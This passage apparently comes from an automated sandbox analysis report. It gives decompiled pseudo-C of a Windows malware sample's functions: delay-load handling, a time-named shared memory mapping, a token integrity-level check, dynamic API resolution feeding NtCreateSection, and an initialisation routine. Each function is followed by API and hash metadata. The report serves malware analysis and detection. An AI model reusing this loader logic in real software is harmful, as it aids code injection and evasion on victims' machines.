                                                          				if(( *_t139 & 0x00000001) == 0) {
                                                          					_a8 =  &_v72;
                                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                          					return 0;
                                                          				}
                                                          				_t138 =  *_v28;
                                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                                          				_t133 =  *(_t131 + _t76);
                                                          				_a4 = _t76;
                                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                          				_v56 = _t80;
                                                          				_t81 = _t133 + 0x5e0002;
                                                          				if(_t80 == 0) {
                                                          					_t81 = _t133 & 0x0000ffff;
                                                          				}
                                                          				_v52 = _t81;
                                                          				_t82 =  *0x5ed1a0; // 0x0
                                                          				_t116 = 0;
                                                          				if(_t82 == 0) {
                                                          					L6:
                                                          					if(_t138 != 0) {
                                                          						L18:
                                                          						_t83 =  *0x5ed1a0; // 0x0
                                                          						_v48 = _t138;
                                                          						if(_t83 != 0) {
                                                          							_t116 =  *_t83(2,  &_v72);
                                                          						}
                                                          						if(_t116 != 0) {
                                                          							L32:
                                                          							 *_a8 = _t116;
                                                          							L33:
                                                          							_t85 =  *0x5ed1a0; // 0x0
                                                          							if(_t85 != 0) {
                                                          								_v40 = _v40 & 0x00000000;
                                                          								_v48 = _t138;
                                                          								_v44 = _t116;
                                                          								 *_t85(5,  &_v72);
                                                          							}
                                                          							return _t116;
                                                          						} else {
                                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                          								L27:
                                                          								_t116 = GetProcAddress(_t138, _v52);
                                                          								if(_t116 == 0) {
                                                          									_v40 = GetLastError();
                                                          									_t90 =  *0x5ed19c; // 0x0
                                                          									if(_t90 != 0) {
                                                          										_t116 =  *_t90(4,  &_v72);
                                                          									}
                                                          									if(_t116 == 0) {
                                                          										_a4 =  &_v72;
                                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                          										_t116 = _v44;
                                                          									}
                                                          								}
                                                          								goto L32;
                                                          							} else {
                                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                          									_t116 =  *(_a4 + _v16);
                                                          									if(_t116 != 0) {
                                                          										goto L32;
                                                          									}
                                                          								}
                                                          								goto L27;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t98 =  *0x5ed1a0; // 0x0
                                                          					if(_t98 == 0) {
                                                          						L9:
                                                          						_t99 = LoadLibraryA(_v60); // executed
                                                          						_t138 = _t99;
                                                          						if(_t138 != 0) {
                                                          							L13:
                                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                          								FreeLibrary(_t138);
                                                          							} else {
                                                          								if(_t139[6] != 0) {
                                                          									_t102 = LocalAlloc(0x40, 8);
                                                          									if(_t102 != 0) {
                                                          										 *(_t102 + 4) = _t139;
                                                          										_t125 =  *0x5ed198; // 0x0
                                                          										 *_t102 = _t125;
                                                          										 *0x5ed198 = _t102;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L18;
                                                          						}
                                                          						_v40 = GetLastError();
                                                          						_t104 =  *0x5ed19c; // 0x0
                                                          						if(_t104 == 0) {
                                                          							L12:
                                                          							_a8 =  &_v72;
                                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                          							return _v44;
                                                          						}
                                                          						_t138 =  *_t104(3,  &_v72);
                                                          						if(_t138 != 0) {
                                                          							goto L13;
                                                          						}
                                                          						goto L12;
                                                          					}
                                                          					_t138 =  *_t98(1,  &_v72);
                                                          					if(_t138 != 0) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				_t116 =  *_t82(0,  &_v72);
                                                          				if(_t116 != 0) {
                                                          					goto L33;
                                                          				}
                                                          				goto L6;
                                                          			}

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005EACCE
                                                          • LoadLibraryA.KERNELBASE(?), ref: 005EAD4B
                                                          • GetLastError.KERNEL32 ref: 005EAD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 005EAD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: 9f68fd93eefb90fe84ce626d48f82f91e3dfdf871eb8e539949585994fa8afba
                                                          • Instruction ID: a54a53954ef2934dc3c98c2ff2bf53f5bcbe4d079e305d34fd3dd217c6874c87
                                                          • Opcode Fuzzy Hash: 9f68fd93eefb90fe84ce626d48f82f91e3dfdf871eb8e539949585994fa8afba
                                                          • Instruction Fuzzy Hash: 16816C71A00345EFDB28CFA9C984AAEBBF5FF58310F148429E985DB250E770E905CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 69%
                                                          			E10001ADA(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                          				intOrPtr _v12;
                                                          				struct _FILETIME* _v16;
                                                          				short _v60;
                                                          				struct _FILETIME* _t14;
                                                          				intOrPtr _t15;
                                                          				long _t18;
                                                          				void* _t19;
                                                          				void* _t22;
                                                          				intOrPtr _t31;
                                                          				long _t32;
                                                          				void* _t34;
                                                          
                                                          				_t31 = __edx;
                                                          				_t14 =  &_v16;
                                                          				GetSystemTimeAsFileTime(_t14);
                                                          				_push(0x192);
                                                          				_push(0x54d38000);
                                                          				_push(_v12);
                                                          				_push(_v16);
                                                          				L10002130();
                                                          				_push(_t14);
                                                          				_v16 = _t14;
                                                          				_t15 =  *0x10004144;
                                                          				_push(_t15 + 0x1000505e);
                                                          				_push(_t15 + 0x10005054);
                                                          				_push(0x16);
                                                          				_push( &_v60);
                                                          				_v12 = _t31;
                                                          				L1000212A();
                                                          				_t18 = _a4;
                                                          				if(_t18 == 0) {
                                                          					_t18 = 0x1000;
                                                          				}
                                                          				_t19 = CreateFileMappingW(0xffffffff, 0x10004148, 4, 0, _t18,  &_v60); // executed
                                                          				_t34 = _t19;
                                                          				if(_t34 == 0) {
                                                          					_t32 = GetLastError();
                                                          				} else {
                                                          					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                          						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                          						if(_t22 == 0) {
                                                          							_t32 = GetLastError();
                                                          							if(_t32 != 0) {
                                                          								goto L9;
                                                          							}
                                                          						} else {
                                                          							 *_a8 = _t34;
                                                          							 *_a12 = _t22;
                                                          							_t32 = 0;
                                                          						}
                                                          					} else {
                                                          						_t32 = 2;
                                                          						L9:
                                                          						CloseHandle(_t34);
                                                          					}
                                                          				}
                                                          				return _t32;
                                                          			}

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 10001AE7
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001AFD
                                                          • _snwprintf.NTDLL ref: 10001B22
                                                          • CreateFileMappingW.KERNELBASE(000000FF,10004148,00000004,00000000,?,?), ref: 10001B47
                                                          • GetLastError.KERNEL32 ref: 10001B5E
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 10001B72
                                                          • GetLastError.KERNEL32 ref: 10001B8A
                                                          • CloseHandle.KERNEL32(00000000), ref: 10001B93
                                                          • GetLastError.KERNEL32 ref: 10001B9B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1724014008-0
                                                          • Opcode ID: 2e8302c24db467e9b5466d5654d080b83219e3fbe8e67ba6f678f57f6a515046
                                                          • Instruction ID: bcc887d71675999c673e285f1704182bf9803c61a9668b0f160e92206cf9e2cc
                                                          • Opcode Fuzzy Hash: 2e8302c24db467e9b5466d5654d080b83219e3fbe8e67ba6f678f57f6a515046
                                                          • Instruction Fuzzy Hash: 50216DB6900118BFF711EFA4CC84EDE77ADEB543D0F118066FA05D7154EB3099468B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E005E232F(intOrPtr __edx, void** _a4, void** _a8) {
                                                          				intOrPtr _v8;
                                                          				struct _FILETIME* _v12;
                                                          				short _v56;
                                                          				struct _FILETIME* _t12;
                                                          				intOrPtr _t13;
                                                          				void* _t17;
                                                          				void* _t21;
                                                          				intOrPtr _t27;
                                                          				long _t28;
                                                          				void* _t30;
                                                          
                                                          				_t27 = __edx;
                                                          				_t12 =  &_v12;
                                                          				GetSystemTimeAsFileTime(_t12);
                                                          				_push(0x192);
                                                          				_push(0x54d38000);
                                                          				_push(_v8);
                                                          				_push(_v12);
                                                          				L005EAF28();
                                                          				_push(_t12);
                                                          				_v12 = _t12;
                                                          				_t13 =  *0x5ed2a8; // 0x107a5a8
                                                          				_t5 = _t13 + 0x5ee87e; // 0x1668e26
                                                          				_t6 = _t13 + 0x5ee59c; // 0x530025
                                                          				_push(0x16);
                                                          				_push( &_v56);
                                                          				_v8 = _t27;
                                                          				L005EABCA();
                                                          				_t17 = CreateFileMappingW(0xffffffff, 0x5ed2ac, 4, 0, 0x1000,  &_v56); // executed
                                                          				_t30 = _t17;
                                                          				if(_t30 == 0) {
                                                          					_t28 = GetLastError();
                                                          				} else {
                                                          					if(GetLastError() == 0xb7) {
                                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                          						if(_t21 == 0) {
                                                          							_t28 = GetLastError();
                                                          							if(_t28 != 0) {
                                                          								goto L6;
                                                          							}
                                                          						} else {
                                                          							 *_a4 = _t30;
                                                          							 *_a8 = _t21;
                                                          							_t28 = 0;
                                                          						}
                                                          					} else {
                                                          						_t28 = 2;
                                                          						L6:
                                                          						CloseHandle(_t30);
                                                          					}
                                                          				}
                                                          				return _t28;
                                                          			}

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,005E5C31,?,?,4D283A53,?,?), ref: 005E233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 005E2351
                                                          • _snwprintf.NTDLL ref: 005E2376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,005ED2AC,00000004,00000000,00001000,?), ref: 005E2392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,005E5C31,?,?,4D283A53), ref: 005E23A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 005E23BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,005E5C31,?,?), ref: 005E23DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,005E5C31,?,?,4D283A53), ref: 005E23E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 2437ad210062c0c28778dba2fe4cb175f766732a60ea3c4f6b0ee8619141f16f
                                                          • Instruction ID: de95a8885a64527a6e5de91d66442978d71e0e5eef8475525f7554deba8daa8b
                                                          • Opcode Fuzzy Hash: 2437ad210062c0c28778dba2fe4cb175f766732a60ea3c4f6b0ee8619141f16f
                                                          • Instruction Fuzzy Hash: E721F372600284FBC728AB65CC89F9E3FADBB98700F200521F685EA190D670E9099B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 57%
                                                          			E005E5BA2(signed int __edx) {
                                                          				signed int _v8;
                                                          				long _v12;
                                                          				CHAR* _v16;
                                                          				long _v20;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t21;
                                                          				CHAR* _t22;
                                                          				CHAR* _t25;
                                                          				intOrPtr _t26;
                                                          				void* _t27;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          				CHAR* _t36;
                                                          				CHAR* _t42;
                                                          				CHAR* _t43;
                                                          				CHAR* _t44;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				CHAR* _t54;
                                                          				signed char _t56;
                                                          				intOrPtr _t58;
                                                          				signed int _t59;
                                                          				void* _t62;
                                                          				CHAR* _t65;
                                                          				CHAR* _t66;
                                                          				char* _t67;
                                                          				void* _t68;
                                                          
                                                          				_t61 = __edx;
                                                          				_v20 = 0;
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				_t21 = E005E6C09();
                                                          				if(_t21 != 0) {
                                                          					_t59 =  *0x5ed25c; // 0x2000000a
                                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                                          					 *0x5ed25c = (_t59 & 0xf0000000) + _t21;
                                                          				}
                                                          				_t22 =  *0x5ed160(0, 2); // executed
                                                          				_v16 = _t22;
                                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                          					_t25 = E005E496B( &_v8,  &_v20); // executed
                                                          					_t54 = _t25;
                                                          					_t26 =  *0x5ed2a8; // 0x107a5a8
                                                          					if( *0x5ed25c > 5) {
                                                          						_t8 = _t26 + 0x5ee5cd; // 0x4d283a53
                                                          						_t27 = _t8;
                                                          					} else {
                                                          						_t7 = _t26 + 0x5ee9f5; // 0x44283a44
                                                          						_t27 = _t7;
                                                          					}
                                                          					E005E729A(_t27, _t27);
                                                          					_t31 = E005E232F(_t61,  &_v20,  &_v12); // executed
                                                          					if(_t31 == 0) {
                                                          						CloseHandle(_v20);
                                                          					}
                                                          					_t62 = 5;
                                                          					if(_t54 != _t62) {
                                                          						 *0x5ed270 =  *0x5ed270 ^ 0x81bbe65d;
                                                          						_t32 = E005EA71F(0x60);
                                                          						 *0x5ed32c = _t32;
                                                          						__eflags = _t32;
                                                          						if(_t32 == 0) {
                                                          							_push(8);
                                                          							_pop(0);
                                                          						} else {
                                                          							memset(_t32, 0, 0x60);
                                                          							_t49 =  *0x5ed32c; // 0x16695b0
                                                          							_t68 = _t68 + 0xc;
                                                          							__imp__(_t49 + 0x40);
                                                          							_t51 =  *0x5ed32c; // 0x16695b0
                                                          							 *_t51 = 0x5ee81a;
                                                          						}
                                                          						_t54 = 0;
                                                          						__eflags = 0;
                                                          						if(0 == 0) {
                                                          							_t36 = RtlAllocateHeap( *0x5ed238, 0, 0x43);
                                                          							 *0x5ed2c8 = _t36;
                                                          							__eflags = _t36;
                                                          							if(_t36 == 0) {
                                                          								_push(8);
                                                          								_pop(0);
                                                          							} else {
                                                          								_t56 =  *0x5ed25c; // 0x2000000a
                                                          								_t61 = _t56 & 0x000000ff;
                                                          								_t58 =  *0x5ed2a8; // 0x107a5a8
                                                          								_t13 = _t58 + 0x5ee55a; // 0x697a6f4d
                                                          								_t55 = _t13;
                                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x5ec287);
                                                          							}
                                                          							_t54 = 0;
                                                          							__eflags = 0;
                                                          							if(0 == 0) {
                                                          								asm("sbb eax, eax");
                                                          								E005E9135( ~_v8 &  *0x5ed270,  &E005ED00C); // executed
                                                          								_t42 = E005E888E(_t55); // executed
                                                          								_t54 = _t42;
                                                          								__eflags = _t54;
                                                          								if(_t54 != 0) {
                                                          									goto L30;
                                                          								}
                                                          								_t43 = E005E87AE(); // executed
                                                          								__eflags = _t43;
                                                          								if(_t43 != 0) {
                                                          									__eflags = _v8;
                                                          									_t65 = _v12;
                                                          									if(_v8 != 0) {
                                                          										L29:
                                                          										_t44 = E005E51B0(_t61, _t65, _v8); // executed
                                                          										_t54 = _t44;
                                                          										goto L30;
                                                          									}
                                                          									__eflags = _t65;
                                                          									if(__eflags == 0) {
                                                          										goto L30;
                                                          									}
                                                          									_t54 = E005E1C66(__eflags,  &(_t65[4]));
                                                          									__eflags = _t54;
                                                          									if(_t54 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									goto L29;
                                                          								}
                                                          								_t54 = 8;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t66 = _v12;
                                                          						if(_t66 == 0) {
                                                          							L30:
                                                          							if(_v16 == 0 || _v16 == 1) {
                                                          								 *0x5ed15c();
                                                          							}
                                                          							goto L34;
                                                          						}
                                                          						_t67 =  &(_t66[4]);
                                                          						do {
                                                          						} while (E005EA273(_t62, _t67, 0, 1) == 0x4c7);
                                                          					}
                                                          					goto L30;
                                                          				} else {
                                                          					_t54 = _t22;
                                                          					L34:
                                                          					return _t54;
                                                          				}
                                                          			}

                                                          APIs
                                                            • Part of subcall function 005E6C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,005E5BBB,00000000,00000000), ref: 005E6C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 005E5C38
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • memset.NTDLL ref: 005E5C87
                                                          • RtlInitializeCriticalSection.NTDLL(01669570), ref: 005E5C98
                                                            • Part of subcall function 005E1C66: memset.NTDLL ref: 005E1C7B
                                                            • Part of subcall function 005E1C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 005E1CBD
                                                            • Part of subcall function 005E1C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 005E1CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 005E5CC3
                                                          • wsprintfA.USER32 ref: 005E5CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID: i+
                                                          • API String ID: 4246211962-4239572274
                                                          • Opcode ID: e9eb1c5aa65d7286ba3fa95a69b232cc1c327c030584564ce2e92266c7a54891
                                                          • Instruction ID: 11624f4f65273cbe3d72675a9ac41bb5c8e320ebeca41a16a0874d40e0a68ea9
                                                          • Opcode Fuzzy Hash: e9eb1c5aa65d7286ba3fa95a69b232cc1c327c030584564ce2e92266c7a54891
                                                          • Instruction Fuzzy Hash: BF514871A00B98ABCB2D9BA2CC8DB5E7FB8BB14704F144815F2C1DB151F6708E09DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E005E1A08(long* _a4) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void _v16;
                                                          				long _v20;
                                                          				int _t33;
                                                          				void* _t46;
                                                          
                                                          				_v16 = 1;
                                                          				_v20 = 0x2000;
                                                          				if( *0x5ed25c > 5) {
                                                          					_v16 = 0;
                                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                          						_v8 = 0;
                                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                          						if(_v8 != 0) {
                                                          							_t46 = E005EA71F(_v8);
                                                          							if(_t46 != 0) {
                                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                          								if(_t33 != 0) {
                                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                          								}
                                                          								E005EA734(_t46);
                                                          							}
                                                          						}
                                                          						CloseHandle(_v12);
                                                          					}
                                                          				}
                                                          				 *_a4 = _v20;
                                                          				return _v16;
                                                          			}

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 005E1A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 005E1A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 005E1A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 005E1ABA
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 005E1A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 005E1A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 005E1AA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: 43981d19976cd1911d6206e18d917e819718dde20bb411a7bf7eb6262476b1d6
                                                          • Instruction ID: e50923e21282b0859b94ab1005090c970388933cc95897e695d8ca34ef150b04
                                                          • Opcode Fuzzy Hash: 43981d19976cd1911d6206e18d917e819718dde20bb411a7bf7eb6262476b1d6
                                                          • Instruction Fuzzy Hash: F1215C75900289FFEB04DFA1DC88EAEBFBAFB44300F040065E950A61A0D7719E45EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 005E395A
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 005E39DD
                                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 005E3A1D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E3A3F
                                                            • Part of subcall function 005E6F3A: SysAllocString.OLEAUT32(005EC290), ref: 005E6F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 005E3A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E3AA1
                                                            • Part of subcall function 005E1AE2: Sleep.KERNELBASE(000001F4), ref: 005E1B2A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                          • String ID:
                                                          • API String ID: 2118684380-0
                                                          • Opcode ID: 9f8953d2e204d7a83f1980cc4cff75c28e292e4144cd8f6080ad50f3a4909e2b
                                                          • Instruction ID: 79a3653c768b5444cef1281662d3f6a8d86392c1df9a15c9a534750167574d00
                                                          • Opcode Fuzzy Hash: 9f8953d2e204d7a83f1980cc4cff75c28e292e4144cd8f6080ad50f3a4909e2b
                                                          • Instruction Fuzzy Hash: 2B516176500649EFDB05CFA9C888AAEBBB6FF88740B144469E585DB220DB31DE45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E10001146(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                          				intOrPtr _v8;
                                                          				_Unknown_base(*)()* _t29;
                                                          				_Unknown_base(*)()* _t33;
                                                          				_Unknown_base(*)()* _t36;
                                                          				_Unknown_base(*)()* _t39;
                                                          				_Unknown_base(*)()* _t42;
                                                          				intOrPtr _t46;
                                                          				struct HINSTANCE__* _t50;
                                                          				intOrPtr _t56;
                                                          
                                                          				_t56 = E10002009(0x20);
                                                          				if(_t56 == 0) {
                                                          					_v8 = 8;
                                                          				} else {
                                                          					_t50 = GetModuleHandleA( *0x10004144 + 0x10005014);
                                                          					_v8 = 0x7f;
                                                          					_t29 = GetProcAddress(_t50,  *0x10004144 + 0x10005151);
                                                          					 *(_t56 + 0xc) = _t29;
                                                          					if(_t29 == 0) {
                                                          						L8:
                                                          						E1000201E(_t56);
                                                          					} else {
                                                          						_t33 = GetProcAddress(_t50,  *0x10004144 + 0x10005161);
                                                          						 *(_t56 + 0x10) = _t33;
                                                          						if(_t33 == 0) {
                                                          							goto L8;
                                                          						} else {
                                                          							_t36 = GetProcAddress(_t50,  *0x10004144 + 0x10005174);
                                                          							 *(_t56 + 0x14) = _t36;
                                                          							if(_t36 == 0) {
                                                          								goto L8;
                                                          							} else {
                                                          								_t39 = GetProcAddress(_t50,  *0x10004144 + 0x10005189);
                                                          								 *(_t56 + 0x18) = _t39;
                                                          								if(_t39 == 0) {
                                                          									goto L8;
                                                          								} else {
                                                          									_t42 = GetProcAddress(_t50,  *0x10004144 + 0x1000519f);
                                                          									 *(_t56 + 0x1c) = _t42;
                                                          									if(_t42 == 0) {
                                                          										goto L8;
                                                          									} else {
                                                          										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                          										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                          										_t46 = E10001996(_t56, _a12); // executed
                                                          										_v8 = _t46;
                                                          										if(_t46 != 0) {
                                                          											goto L8;
                                                          										} else {
                                                          											 *_a16 = _t56;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v8;
                                                          			}












                                                          APIs
                                                            • Part of subcall function 10002009: HeapAlloc.KERNEL32(00000000,?,10001FA5,00000208,00000000,00000000,?,?,?,100014C0,?), ref: 10002015
                                                          • GetModuleHandleA.KERNEL32(?,00000020), ref: 1000116A
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 1000118C
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 100011A2
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 100011B8
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 100011CE
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 100011E4
                                                            • Part of subcall function 10001996: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 100019F3
                                                            • Part of subcall function 10001996: memset.NTDLL ref: 10001A15
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                          • String ID:
                                                          • API String ID: 1632424568-0
                                                          • Opcode ID: 17d813e253e26c7d917519e6547015275f2db354573dbeff9a142f8077207000
                                                          • Instruction ID: cc8e7b0cdea4028d8609f0a74ea6faac012f454d02bbe199c50159465f61c836
                                                          • Opcode Fuzzy Hash: 17d813e253e26c7d917519e6547015275f2db354573dbeff9a142f8077207000
                                                          • Instruction Fuzzy Hash: EA2107B160071AAFEB11DFB9CD80E9BB7ECEF643C17024466E945D7219EB70E9108B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                          				long _v8;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				char _t9;
                                                          				void* _t10;
                                                          				void* _t18;
                                                          				void* _t23;
                                                          				void* _t36;
                                                          
                                                          				_push(__ecx);
                                                          				_t9 = _a8;
                                                          				_v8 = 1;
                                                          				if(_t9 == 0) {
                                                          					_t10 = InterlockedDecrement(0x10004108);
                                                          					__eflags = _t10;
                                                          					if(_t10 == 0) {
                                                          						__eflags =  *0x1000410c;
                                                          						if( *0x1000410c != 0) {
                                                          							_t36 = 0x2328;
                                                          							while(1) {
                                                          								SleepEx(0x64, 1);
                                                          								__eflags =  *0x10004118;
                                                          								if( *0x10004118 == 0) {
                                                          									break;
                                                          								}
                                                          								_t36 = _t36 - 0x64;
                                                          								__eflags = _t36;
                                                          								if(_t36 > 0) {
                                                          									continue;
